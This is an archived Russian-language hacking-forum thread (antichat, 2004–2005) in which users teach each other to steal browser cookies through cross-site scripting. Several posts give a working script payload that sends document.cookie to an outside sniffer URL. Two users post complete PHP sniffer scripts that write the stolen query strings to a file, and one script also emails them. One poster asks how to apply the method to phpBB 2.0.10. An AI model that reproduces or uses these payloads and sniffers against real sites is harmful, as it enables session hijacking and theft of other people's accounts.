PDA

Просмотр полной версии : Вопрос про отправку кук на сниффер http://antichat.ru/cgi-bin/s.jpg?

23.07.2004, 19:11
Я конечно дико извиняюсь за свое ламерство, но скажите мне пожалуйста вот что:
Что мне нужно ставить после http://antichat.ru/cgi-bin/s.jpg? чтобы он отправил мне куки? (+document.cookie не катит...или я совсем дурак =( т.е. сниффер прокатывает, лог ведется, а куки не отправляются
Algol
23.07.2004, 19:28
В примерах же описано
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
[/QUOTE]<span id='postcolor'>
Liss
23.07.2004, 20:24
че то вот эта связка как раз и не работает. Я тестил так: создал док. на локальном компе и сам же туда и зашел. В логах отобразилось что я там был, но куков не отправилось
Algol
24.07.2004, 00:55
Парень, почитай что такое куки вообще.... А потом уже задавай вопросы...
Че Гевара
25.07.2004, 17:08
Liss, с помощью джаваскрипта можно получить кукисы только текущего документа ...

Если вставить сниффер, например, на главную страничку античата, то содержимое кукисов будет:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
hotlog=1; hotlog=1
[/QUOTE]<span id='postcolor'>
Это кукисы счетчика хотлог ...

Как видишь, куки от mail.ru здесь не фигурируют ... http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif
zFailure
29.07.2004, 08:05
проще говоря
для каждого домена свои куки
соответственно, в каком домене исполняется JavaScript к тем кукам он и имеет доступ
жека
10.10.2004, 17:12
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июля 23 2004,19:28)</td></tr><tr><td id="QUOTE">В примерах же описано
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
[/QUOTE]<span id='postcolor'>[/QUOTE]<span id='postcolor'>
Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...
Algol
11.10.2004, 12:20
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 10 2004,17:12)</td></tr><tr><td id="QUOTE">Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE]<span id='postcolor'>
Что бы мы все тут делали, если бы это было так легко рассказать? ))
Это ж искусство))
DOKTOP_CMEPTb
11.10.2004, 16:14
А это че озназает - img = new Image();
Скажите Пллиз !!!
zFailure
11.10.2004, 19:54
переменной img присваевается талько что созданный экземпляр объекта класса &nbsp;Image

ну короче картинка с именем img создается по простому
salop
13.10.2004, 19:31
<script&gt;img = new Image(); img.src = &quot;http://antichat.ru/cgi-bin/s.jpg?&quot;+document.cookie;&lt;/script&gt;
а на пшп какой функцией получить куки ?

например есть
&lt;?
$adr = &quot;&quot;.getenv(&quot;HTTP_REFERER&quot;).&quot;&quot;;
print $adr
?&gt;
что нужно добавить ?
zFailure
13.10.2004, 19:43
$_COOKIE[&quot;переменная&quot;];

или массив
implode('', $_COOKIE);
salop
13.10.2004, 20:03
спасибо тебе
salop
13.10.2004, 20:09
чтото неполучаеться у меня...можеш написать код пожалуйста ?
zFailure
13.10.2004, 23:47
если ты имеешь ввиду код снифера, то вот

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><?

$filename = 'sniff.txt';
$somecontent = date("l dS of F Y h:i:s A") .
"\r\nSERVER_ADDR = " . $_SERVER["SERVER_ADDR"] .
(isset($_SERVER["HTTP_REFERER"]) ? "\r\nHTTP_REFERER = " . $_SERVER["HTTP_REFERER"] : '') .
"\r\nQUERY_STRING = " . $_SERVER["QUERY_STRING"] . "\r\n\r\n";

mail('mail@addr.com', 'sniff', $somecontent);

// Let's make sure the file exists and is writable first.
if (is_writable($filename)) {

// In our example we're opening $filename in append mode.
// The file pointer is at the bottom of the file hence
// that's where $somecontent will go when we fwrite() it.
if (!$handle = fopen($filename, 'a')) {
echo "Cannot open file ($filename)";
exit;
}

// Write $somecontent to our opened file.
if (fwrite($handle, $somecontent) === FALSE) {
echo "Cannot write to file ($filename)";
exit;
}

//echo "Success, wrote ($somecontent) to file ($filename)";

fclose($handle);

} else {
echo "The file $filename is not writable";
}

?>[/QUOTE]<span id='postcolor'>
salop
13.10.2004, 23:57
спасибо...пригодиться...но этот снифер не тянет куки
zFailure
14.10.2004, 09:03
этот снифер тянет все что ему дать

а куки можно утянуть только одним способом
...='http://.../1.php?'+document.cookie т.е. через QUERY_STRING
Algol
14.10.2004, 13:57
2salop
Тянуть куки пхп-шным $_COOKIE[&quot;переменная&quot;]; бесполезно, поскольку так ты получишь совсем не те куки, на которые рассчитываешь))
X-Seven
13.11.2004, 02:36
А как этим сниффером можно потянуть куки phpbb2.0.10?
Если вставлять через [img] как картинку,то в логах
фиксируется только ip и урл.Есть какие-нибудь способы?
Zadoxlik
22.07.2005, 14:54
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июля 23 2004,19:28)</td></tr><tr><td id="QUOTE">В примерах же описано
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
<span id='postcolor'>[/QUOTE]<span id='postcolor'>
Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE]



Ой не могу =))) сердце аж прихватило =)))) я плакаль
ProTeuS
23.07.2005, 05:44
<span id='postcolor'><span id='postcolor'>
Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE]



Ой не могу =))) сердце аж прихватило =)))) я плакаль[/QUOTE]

4ому, зви4айнісенький собі пост, тільки для тупих ламерів :)))
kir0k
24.07.2005, 20:56
я например юзаю свой простейший сниффер, snif.php:
<?
if (!empty($_GET['id'])) {
$b="\n---beginning---\n";
$id=$_GET['id'];
$e="\n------end------";
$p=fopen("c.txt","a");
fputs($p,$b);
fputs($p,$id);
fputs($p,$e);
fclose($p);
echo "<script>window.close();</script>";
}
else
echo "\nUnknown error!";
?>
а потом вставляю такой javascript:
<script>img = new Image(); img.src = "http://mysite.ru/snif.php?id="+document.cookie;</script>